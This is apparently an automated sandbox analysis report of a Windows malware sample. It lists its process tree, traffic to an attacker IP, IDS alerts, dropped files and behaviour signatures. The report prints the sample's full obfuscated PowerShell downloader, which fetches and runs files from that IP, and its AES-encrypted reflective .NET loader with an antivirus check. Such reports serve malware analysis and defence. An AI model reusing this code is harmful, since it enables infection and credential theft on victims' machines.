Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 10:59 a.m. | May 9, 2024, 11:01 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ 
@(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;
2644-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2812 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC 
([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "
2116 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2068
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
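No hosts contacted by domain name; the sample connected directly to the IP address listed in the table below (the captured requests carry `Host: 193.222.96.143:7287`). |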
IP Address | Status | Action |
---|---|---|
193.222.96.143 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.143:7287 -> 192.168.56.101:49167 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.143:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS events recorded.
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\~$Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\xx.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Excel.xlsx.LNK |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ 
@(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ 
@(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xx.bat" |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC 
([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); " |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 66832 Content-Type: application/octet-stream Connection:close @echo off set "JbUhLV=seBgrIot BgrIoTBgrIoxkJBgrIo=BgrIo1 BgrIo&&BgrIo stBgrIoarBgrIot BgrIo""BgrIo /BgrIomiBgrIon BgrIo" set "CTregK=&&BgrIo BgrIoeBgrIoxiBgrIotBgrIo" set "cYogot=notBgrIo BgrIodeBgrIofinBgrIoedBgrIo BgrIoTBgrIoxkJBgrIo if %cYogot:BgrIo=% (%JbUhLV:BgrIo=%%0 %CTregK:BgrIo=%) ::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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data sent | GET /Excel.xlsx HTTP/1.1 Host: 193.222.96.143:7287 Connection: Keep-Alive |
Data sent | GET /xx.bat HTTP/1.1 Host: 193.222.96.143:7287 |
description | Create a Windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.143 |
file | C:\Users\test22\AppData\Roaming\Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\xx.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xx.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xx.bat | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\Excel.xlsx |
